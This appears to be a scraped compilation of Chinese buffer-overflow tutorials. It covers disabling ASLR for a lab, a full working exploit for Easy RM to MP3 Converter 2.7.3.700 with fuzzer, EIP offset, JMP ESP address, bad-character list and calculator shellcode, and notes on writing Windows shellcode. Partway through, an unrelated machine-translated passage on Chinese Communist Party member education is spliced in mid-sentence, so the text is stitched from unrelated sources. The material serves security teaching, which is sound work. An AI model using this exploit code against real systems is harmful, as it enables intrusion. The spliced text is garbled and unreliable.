缓冲区溢出及ShellCode编写

缓冲区溢出漏洞实验一、实验描述缓冲区溢出是指程序试图向缓冲区写入超出预分配固定长度数据的情况。

这一漏洞可以被恶意用户利用来改变程序的流控制，甚至执行代码的任意片段。

这一漏洞的出现是由于数据缓冲器和返回地址的暂时关闭，溢出会引起返回地址被重写。

二、实验准备本次实验为了方便观察汇编语句，我们需要在32位环境下作操作，因此实验之前需要做一些准备。

1、输入命令安装一些用于编译32位C程序的东西：sudo apt-get updatesudo apt-get install lib32z1 libc6-dev-i386sudo apt-get install lib32readline-gplv2-dev2、输入命令“linux32”进入32位linux环境。

此时你会发现，命令行用起来没那么爽了，比如不能tab补全了，所以输入“/bin/bash”使用bash：三、实验步骤3.1 初始设置Ubuntu和其他一些Linux系统中，使用地址空间随机化来随机堆（heap）和栈（stack）的初始地址，这使得猜测准确的内存地址变得十分困难，而猜测内存地址是缓冲区溢出攻击的关键。

因此本次实验中，我们使用以下命令关闭这一功能：sudo sysctl -w kernel.randomize_va_space=0此外，为了进一步防范缓冲区溢出攻击及其它利用shell程序的攻击，许多shell程序在被调用时自动放弃它们的特权。

因此，即使你能欺骗一个Set-UID程序调用一个shell，也不能在这个shell中保持root权限，这个防护措施在/bin/bash中实现。

linux系统中，/bin/sh实际是指向/bin/bash或/bin/dash的一个符号链接。

为了重现这一防护措施被实现之前的情形，我们使用另一个shell程序（zsh）代替/bin/bash。

下面的指令描述了如何设置zsh程序：sudo sucd /binrm shln -s zsh shexit3.2 shellcode一般情况下，缓冲区溢出会造成程序崩溃，在程序中，溢出的数据覆盖了返回地址。

缓冲区溢出详解缓冲区溢出（Buffer Overflow）是计算机安全领域内既经典⽽⼜古⽼的话题。

随着计算机系统安全性的加强，传统的缓冲区溢出攻击⽅式可能变得不再奏效，相应的介绍缓冲区溢出原理的资料也变得“⼤众化”起来。

其中看雪的《0day安全：软件漏洞分析技术》⼀书将缓冲区溢出攻击的原理阐述得简洁明了。

本⽂参考该书对缓冲区溢出原理的讲解，并结合实际的代码实例进⾏验证。

不过即便如此，完成⼀个简单的溢出代码也需要解决很多书中⽆法涉及的问题，尤其是⾯对较新的具有安全特性的编译器——⽐如MS的Visual Studio2010。

接下来，我们结合具体代码，按照对缓冲区溢出原理的循序渐进地理解⽅式去挖掘缓冲区溢出背后的底层机制。

⼀、代码 <=> 数据顾名思义，缓冲区溢出的含义是为缓冲区提供了多于其存储容量的数据，就像往杯⼦⾥倒⼊了过量的⽔⼀样。

通常情况下，缓冲区溢出的数据只会破坏程序数据，造成意外终⽌。

但是如果有⼈精⼼构造溢出数据的内容，那么就有可能获得系统的控制权！如果说⽤户（也可能是⿊客）提供了⽔——缓冲区溢出攻击的数据，那么系统提供了溢出的容器——缓冲区。

缓冲区在系统中的表现形式是多样的，⾼级语⾔定义的变量、数组、结构体等在运⾏时可以说都是保存在缓冲区内的，因此所谓缓冲区可以更抽象地理解为⼀段可读写的内存区域，缓冲区攻击的最终⽬的就是希望系统能执⾏这块可读写内存中已经被蓄意设定好的恶意代码。

按照冯·诺依曼存储程序原理，程序代码是作为⼆进制数据存储在内存的，同样程序的数据也在内存中，因此直接从内存的⼆进制形式上是⽆法区分哪些是数据哪些是代码的，这也为缓冲区溢出攻击提供了可能。

图1 进程地址空间分布图1是进程地址空间分布的简单表⽰。

代码存储了⽤户程序的所有可执⾏代码，在程序正常执⾏的情况下，程序计数器（PC指针）只会在代码段和操作系统地址空间（内核态）内寻址。

数据段内存储了⽤户程序的全局变量，⽂字池等。

EasyRMtoMP3Converter.m3u格式转换之缓冲区溢出0x00.POC实践环境及⼯具1. VMware + WinXP_SP3_EN2. Immunity Debugger 1.853. Vulnerable App获取:0x02.溢出攻击简介 Easy RM to MP3 Converter 2.7.3.700版本在对.m3u格式⽂件进⾏转换时⽂件内容加载时未对对应缓冲区⼤⼩进⾏检查，可导致栈溢出攻击0x03.漏洞Fuzzer Crash_Fuzzer.py1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 f = open('crash_py.m3u','w')4 f.write("\x41"*10000)5 f.close()6print"Crash File m3u Create Successful.. \n" 执⾏脚本⽣成crash_py.m3u⽂件，Easy RM to MP3 Converter载⼊，修改”\x41”的数量10000~20000~30000字节，25000～30000字节之间执⾏后程序直接报错0x04.构造Exploit1. 定位EIP的相对偏移⼤⼩: 使⽤metasploit-framework附带⼩⼯具pettarn_creat.rb⽣成测试字符串ruby pattern_create.rb -l 5000 > C:\pattern.txtStreip = (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9A 替换Fuzzer中的Buffer Crash_Find_EIP.py1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 f = open('crash_py.m3u','w')4 f.write("\x41"*25000 + (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae35 f.close()6print"Crash File m3u Create Successful.. \n" 执⾏脚本 返回错误EIP地址： 356a4234 接下来使⽤pattern_offset.rb定位出错EIP偏移位置ruby pattern_offset.rb -q 356a4234 -l 5000 计算出偏移地址1064字节 EIP位置位于m3u⽂件偏移25000 + 1064 = 26064字节处 2.确定“JMP ESP”的地址 选取C:\WINDOWS\system32\SHELL32.dll⽂件中的⼀条”JMP ESP”指令的地址值 可以发现有相当多的地址可选，这⾥我们随便选取第⼀条：7c9d30d7. 3.剔除坏字符: 构造.m3u⽂件,将需要存放ShellCode的位置放⼊\x00~\Xff字符串（先去掉\x00）1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 junk = "\x41" * 260644 eipaddr = "\xd7\x30\x9d\x7c"#jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d756#BadChar: \x00,7 CharCheck = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"8"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"9"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"10"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"11"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"12"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"13"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"14"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")15 #Bad Characters Check1617 data = junk + eipaddr + CharCheck1819 f = open('crash_py.m3u','w')20 f.write(data)21 f.close()22print"Crash File m3u Create Successful.. \n" 运⾏⽣成m3u⽂件，重载程序，在7c9d30d7处下断点，执⾏⾄该处断下 查看当前[ESP-8]处的内存区 发现坏字符\x09，循环以往，共剔除坏字符”\x00,\x01,\x09,\x0a” 4.构造ShellCode： 这⾥我们直接选⽤⽹上⼀段不含以上坏字符的弹出计算器的ShellCode：1 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"2"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"3"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"4"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"5"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"6"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"7"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"8"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"9"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"10"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"11"\x7f\xe8\x7b\xca")0x04.编写Exploit：1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 EN Write With Python23 junk = "\x41" * 260644 eipaddr = "\xd7\x30\x9d\x7c"#jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d75 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"6"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"7"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"8"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"9"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"10"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"11"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"12"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"13"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"14"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"15"\x7f\xe8\x7b\xca")1617 data = junk + eipaddr + shellcode1819 f = open('crash_py.m3u','w')20 f.write(data)21 f.close()22print"Crash File m3u Create Successful.. \n"0x05.攻击测试 重新⽣成m3u⽂件，Windbg重载的Easy RM to MP3 Converter，再次在7c9d30d7处下断点，执⾏⾄该处断下10:000> dd /c 5 000ffd302 000ffd30 7c9d30d7 c931c0db 70167cbf 2474d9cc 581eb1f43 000ffd44 83187831 7803fce8 3085f468 c965bc78 f523b6784 000ffd58 7daeb4f3 323aaa02 ed62bf1c 66d5541d 96e721295 000ffd6c ca71f560 14f53506 1bfb7cc7 27f06b05 22fd48dd6 000ffd80 e8a21b38 7a3bf7c3 234f4ccf 57a453d3 833bd8f77 000ffd94 571f838e a1516453 c6f5cd33 987ec1f5 05f1aaf58 000ffda8 3d9926a8 fed9c03b F10单步执⾏⼀次10:000> p2 eax=00000001 ebx=00104a58 ecx=7c91003d edx=00ce0000 esi=77c5fce0 edi=000066643 eip=000ffd38 esp=000ffd38 ebp=00104678 iopl=0 nv up ei pl nz ac pe nc4 cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=000002165 000ffd38 bf7c1670cc mov edi,0CC70167Ch 查看此时ESP堆栈10:000> dd /c 5 000ffd382 000ffd38 70167cbf 2474d9cc 581eb1f4 83187831 7803fce83 000ffd4c 3085f468 c965bc78 f523b678 7daeb4f3 323aaa024 000ffd60 ed62bf1c 66d5541d 96e72129 ca71f560 14f535065 000ffd74 1bfb7cc7 27f06b05 22fd48dd e8a21b38 7a3bf7c36 000ffd88 234f4ccf 57a453d3 833bd8f7 571f838e a15164537 000ffd9c c6f5cd33 987ec1f5 05f1aaf5 3d9926a8 fed9c03b8 000ffdb0 0eb66151 8719852f 可以发现此时ShellCode的执⾏跳过的“c931c0db”⼀段，那么“JMP ESP”后⾯添加4个nop指令 修改Exploit：1#Crash File to Crash EasyRMtoMP3Converter2.7.3.700.exe on WinXP SP3 Write With Python23 junk = "\x41" * 260644 eipaddr = "\xd7\x30\x9d\x7c"#jmp esp address from C:\WINDOWS\system32\SHELL32.dll 7c9d30d75 nops = "\x90"*86 shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"7"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"8"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"9"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"10"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"11"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"12"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"13"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"14"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"15"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"16"\x7f\xe8\x7b\xca")1718 data = junk + eipaddr + nops + shellcode1920 f = open('crash_py.m3u','w')21 f.write(data)22 f.close()23print"Crash File m3u Create Successful.. \n" 重新⽣成m3u⽂件，重载EasyRMtoMP3Converter 发现nops字节数仍然不够，那么再增加4个\x90 ShellCode成功执⾏0x06.参考资料。

缓冲区溢出（栈溢出）前⾔在现在的⽹络攻击中，缓冲区溢出⽅式的攻击占据了很⼤⼀部分，缓冲区溢出是⼀种⾮常普遍的漏洞，但同时，它也是⾮常危险的⼀种漏洞，轻则导致系统宕机，重则可导致攻击者获取系统权限，进⽽盗取数据，为所欲为。

其实缓冲区攻击说来也简单，请看下⾯⼀段代码：int main(int argc, char *argv[]) {char buffer[8];if(argc > 1) strcpy(buffer, argv[1]);return 0;}当我们在对argv[1]进⾏拷贝操作时，并没对其长度进⾏检查，这时候攻击者便可以通过拷贝⼀个长度⼤于8的字符串来覆盖程序的返回地址，让程序转⽽去执⾏攻击代码，进⽽使得系统被攻击。

本篇主要讲述缓冲区溢出攻击的基本原理，我会从程序是如何利⽤栈这种数据结构来进⾏运⾏的开始，试着编写⼀个shellcode，然后⽤该shellcode来溢出我们的程序来进⾏说明。

我们所要使⽤的系统环境为x86_64 Linux，我们还要⽤到gcc（v7.4.0）、gdb（v8.1.0）等⼯具，另外，我们还需要⼀点汇编语⾔的基础，并且我们使⽤AT&T格式的汇编。

进程在现代的操作系统中，进程是⼀个程序的运⾏实体，当在操作系统中运⾏⼀个程序时，操作系统会为我们的程序创建⼀个进程，并给我们的程序在内存中分配运⾏所需的空间，这些空间被称为进程空间。

进程空间主要有三部分组成：代码段，数据段和栈段。

如下图所⽰：栈栈是⼀种后⼊先出的数据结构，在现代的⼤多数编程语⾔中，都使⽤栈这种数据结构来管理过程之间的调⽤。

那什么⼜是过程之间的调⽤呢，说⽩了，⼀个函数或者⼀个⽅法便是⼀个过程，⽽在函数或⽅法内部调⽤另外的过程和⽅法便是过程间的调⽤。

我们知道，程序的代码是被加载到内存中，然后⼀条条（这⾥指汇编）来执⾏的，⽽且时不时的需要调⽤其他的函数。

当⼀个调⽤过程调⽤⼀个被调⽤过程时，所要执⾏的代码所在的内存地址是不同的，当被调⽤过程执⾏完后，⼜要回到调⽤过程继续执⾏。

Lab1：Buffer OverFlow（上午刚翻译的，用谷歌，有不通顺之处，谅解，时间紧任务重，但大部分应该可以，不影响做实验<有不妥之处请看英文原版>。

本人梅冬，喜欢share,愿共同进步）实验概况重要提示：本课程的实验，包括这个实验，要求你设计一个漏洞，并进行攻击。

这些漏洞和攻击是很现实，你也许可以用它来进行实际的攻击，但你却不应该这样做。

该漏洞设计的唯一目标是教你如何防范他们，而不是如何利用它们来攻击别人 - 攻击计算机系统是非法的，可以让你陷入严重的麻烦。

不要这样做。

在这个实验中，你就会明白缓冲区溢出的代价和明白的攻击怎么发生在现实世界中的应用（比如Web服务器）;实验环境设置下载SEED-Ubuntu12.04，与VirtualBox或VMWare的打开它。

不要做你的裸机上的练习，它可能会咬自己。

注：VM账户ID：root密码：seedubuntuID：种子密码：DEES下载Lab1-code实验需求这里有两种练习：常规练习和挑战的一种。

挑战练习可能不是那么难，但可能会涉及大量代码的黑客。

您需要做的是所有的常规练习。

所有的挑战练习是可选的（但鼓励你尝试一下）。

切入程序当你做完实验，压缩你的解决方案，并提交给学校的信息系统注意：您提交的应包括所有要求在每次锻炼的问题。

A部分：缓冲区溢出校长在这部分实验中，你将学习缓冲区溢出的基本原理，然后你将学习如何使用缓冲区溢出攻击一个简单的漏洞的程序，一些基本定理的意志助理你实现目标。

现在，解压缩lab1-code.zip，浏览我们提供的源代码，并找出文件stack1.c。

在这个文件中有一个简单的C程序，其中有缓冲区溢出漏洞。

您可以使用下面的命令编译这个程序：$ make stack1$ ./stack1注：查看Makefile文件，你应该知道为什么命令make stack1可以编译源文件stack1.c，并注意-g选项，当你使用gdb来调试可执行文件，这将是非常有用的。

carried out "practice line pioneer standard, and post spurs" "members concentrated service months", activities, education guide members always everywhere bearing in mind identity, based job post, active play role. To develop differentiated learning education guide party members in accordance with their own situation, target the problems to, based on the work done. Pay attention to the room and room for grass-roots party organizations, grass-roots party organizations have more autonomy in education, making education more ground, full of vitality, good effect. Finally, highlight the normal long-term. To highlight the characteristics of recurrent education, with long flowing, continuous line of perseverance the perseverance to promote educational efforts to realize the party's ideological and political construction of routine institutionalization. With the party branch as the base unit. Play the role of party branches should be, is the key to educational success. Each branch must take strict education and management responsibility of party members, education based on learning to make specific arrangements, fully mobilize the enthusiasm of party members involved in the education, ensure the Organization in place, measures in place, put in place. To the party organization as the basic form. In the standardized development of learning, make learning more effective efforts, and will adhere to the good party group, organized party, party members and the General Assembly, tell a good party lectures, can drive a good topic about, prevent showy without substance, Sham mules. To implement the education management system for basic support. Democratic mutual evaluation on party members in accordance with the regulations, the real performance criteria and order established, sound carefully dispose of unqualified party members, to further improve the dredge export team, pure self cleaning mechanism. Party leading cadres should adhere to and implement the central group learning system, to which branch of learning exchanges, participation in a dual organization with comrades. Focus on recurrent education, you also need to continue to strengthen the building of grass-roots party organizations. Now, the city also has 88 village party organizations are weak and lax, first Secretary of the village, but conversion requires a process. Recently, the city's party organization focused investigation, check out a total of "lost" members 4,507, "Pocket" members 1037, find there are 640 "lost" party members are not contacted 148 "Pocket" party members and implementation of organizational relationships. Educational management of party members into the Organization, there is a lot of work to do. Weak and lax party continued reorganization as an important task, finish perfect organization, with a good team, Good system. Special highlights of grass-roots party organizations, to be dealt with first in place, further education, reorganization, transformation and educational interaction. In short, through solid and effective work initiativesbroken problem, fill the short Board, so that the majority of party members and fully qualified, comprehensive skills of grass-roots party organizations, grass-roots party level upgrade. Comrades, do a "two" learning education is of great significance, responsibilities, carry significant implications. City levels party and general members cadres, to deep awareness "two learn a do" learning education of importance and need, to height of political consciously and full of political enthusiasm, put "two learn a do" learning education carried out good, for coordination advance "four a full" strategy layout, and achieved "Thirteen-Five" good start, and speed up construction more high ecological vitality happiness of City provides strong powerful guarantee. Two, starting from the revered Constitution respected the party Constitution was XI Jinping, General Secretary to the party's request, 18 six plenary session of the Central Commission for discipline inspection report "five experience" first. Full strictly administering the party, first of all, to exalt the party Constitution, and pipe the whole party, the ruling party of the party Constitution. Revered Constitution reflected in awe. Party a party of ideals and beliefs purpose, summed up the party's fine tradition and style; a clear party members and what can be done and what must be done, what cannot be done. Each Communist Party Constitution to awe and wary eye enhancing the sacred sense of responsibility and mission. Hearts filled with party Constitution, hold the party line, BA obligations unconditionally carry out party members, according to the Constitution of direction towards standards efforts. Respect reflected in the study the party Constitution means. Some party members joined the party Constitution on the shelf, not to learn, some long-term party according to the Constitution of the party's organization, the party is not required to pay membership dues, loose concept, party organizations of the party organization, and turned a blind eye on the tasks assigned by the Organization, were forgotten, forgotten vows performance the party Constitution. Constitution is the fundamental standard of our Communists are slim, the party Constitution to repeatedly learn, practice, thinking, learning and thinking, thinking and row, row, ever-spiraling increase in the learning process. Respect party lines reflected in practice. Two to learn a basic Constitution Party rules, series of speeches, the key to be qualified party members. To be qualified party members, standards are not high, but if he does take a ruler of the party Constitution to "card", truly it is not easy. Carry out study and education, every party must control the party's eight obligations, ask, look for gaps, identify problems, clear direction, work to solve specific problems. Actively practicing in the production life of the eight obligations, to play a vanguard and exemplary role, truly a party banner. "Two" fight to highlight grass-roots party organizationssudo sysctl -w kernel.randomize_va_space=0此外，为了进一步防范缓冲区溢出攻击及其它利用shell 程序的攻击，许多shell 程序在被调用时自动放弃它们的特权。

基于shellcode分析缓冲区溢出攻击一、背景介绍缓冲区溢出攻击是一种常见的软件漏洞利用手段，攻击者利用程序在处理数据时对缓冲区输入的验证不严谨，导致恶意输入的数据溢出到程序的内存空间，从而覆盖程序的关键数据，控制程序的执行流程，甚至执行恶意代码。

Shellcode是缓冲区溢出攻击中常用的一种利用载荷，它可以在成功利用缓冲区溢出漏洞后执行攻击者所写入的恶意代码。

本文将基于shellcode分析缓冲区溢出攻击的原理和实现方法。

二、缓冲区溢出攻击原理1. 缓冲区溢出漏洞缓冲区溢出是指程序处理输入数据时没有进行有效的输入验证，导致输入的数据超出了程序为其分配的内存空间，从而覆盖了程序的关键数据。

这种漏洞在C/C++等低级语言编写的程序中比较常见。

攻击者可以利用这种漏洞来进行恶意代码注入和执行。

2. ShellcodeShellcode是一段用于利用程序漏洞的恶意代码，通常被用于执行特定的攻击操作，如提权、反弹Shell等。

Shellcode通常是以二进制形式存在，可以直接注入到目标程序的内存中，并由程序执行。

3. 执行流程当程序存在缓冲区溢出漏洞时，攻击者可以通过构造特定的恶意输入数据，将Shellcode注入到程序的内存中，然后通过控制程序的执行流程，使其执行Shellcode，从而达到攻击者的目的。

三、基于shellcode的缓冲区溢出攻击实现1. 构造恶意输入数据攻击者需要构造特定的恶意输入数据，包括Shellcode以及用于覆盖程序关键数据的长度和内容。

这些数据应该经过精心构造，以确保能够成功利用程序的缓冲区溢出漏洞。

2. 注入Shellcode一旦攻击者成功构造了恶意输入数据，就可以将Shellcode和覆盖关键数据的内容注入到目标程序的内存中。

这通常需要通过程序的输入接口来实现，这种输入接口包括命令行参数、网络输入等。

四、防范缓冲区溢出攻击缓冲区溢出攻击是一种常见的程序漏洞利用手段，对于程序开发者和系统管理员来说，防范这类攻击非常重要。

Window中的shellcode编写框架（⼊门篇）Shellcode定义 是⼀段可注⼊的指令（opcode），可以在被攻击的程序内运⾏。

特点 短⼩精悍，灵活多变，独⽴存在，⽆需任何⽂件格式的包装，因为shellcode直接操作寄存器和函数，所以opcode必须是16进制形式。

因此也不能⽤⾼级语⾔编写shellcode。

在内存中运⾏，⽆需运⾏在固定的宿主进程上。

Shellcode的利⽤原理 将shellcode注⼊缓冲区，然后欺骗⽬标程序执⾏它。

⽽将shellcode注⼊缓冲区最常⽤的⽅法是利⽤⽬标系统上的缓冲区溢出漏洞。

Shellcode⽣成⽅法编程语⾔编写：汇编语⾔，C语⾔shellcode⽣成器Shellcode编写原则杜绝双引号字符串的直接使⽤ 关闭VS⾃动优化没有使⽤到的变量 ⾃定义函数⼊⼝动态获取函数的地址 GetProAddress 从dll中获取函数的地址 参数1：调⽤dll的句柄，参数2：函数名 Bug：error C2760: 语法错误: 意外的令牌“标识符”，预期的令牌为“类型说明符” 打开项⽬⼯程-> 属性 -> c/c++ --> 语⾔ -> 符合模式修改成否即可如果这样设置将⽆法使⽤c函数。

这个⽐较关键，否则使⽤printf就直接崩溃或者是编译报错 最佳⽅案是：修改平台⼯具集通过获得Kernel32基址来获取GetProcAddres基址避免全局变量的使⽤ 因为vs会将全局变量编译在其他区段中结果就是⼀个绝对的地址不能使⽤static定义变量（变量放到内部函数使⽤）确保已加载使⽤API的动态链接库编写shellcode前的准备修改程序⼊⼝点:链接器-⾼级。

作⽤：去除⾃动⽣成的多余的exe代码关闭缓冲区安全检查，属性->C/C++ ->代码⽣成->安全检查禁⽤设置⼯程兼容window XP :代码⽣成 ->运⾏库选择 debug MTD release MT清除资源:链接器->调试->清单⽂件关闭调试功能如下：属性->常规->平台⼯具集选择xp版本C/C++->代码⽣成->运⾏库选择MT安全检查禁⽤链接器->⾼级->⼊⼝点修改为EntryMain函数动态链接调⽤ 在编写shellcode时，所有⽤到的函数都需要动态调⽤，通过LoadLibrary函数加载动态链接库，GetProAddress获取动态链接库中函数的地址。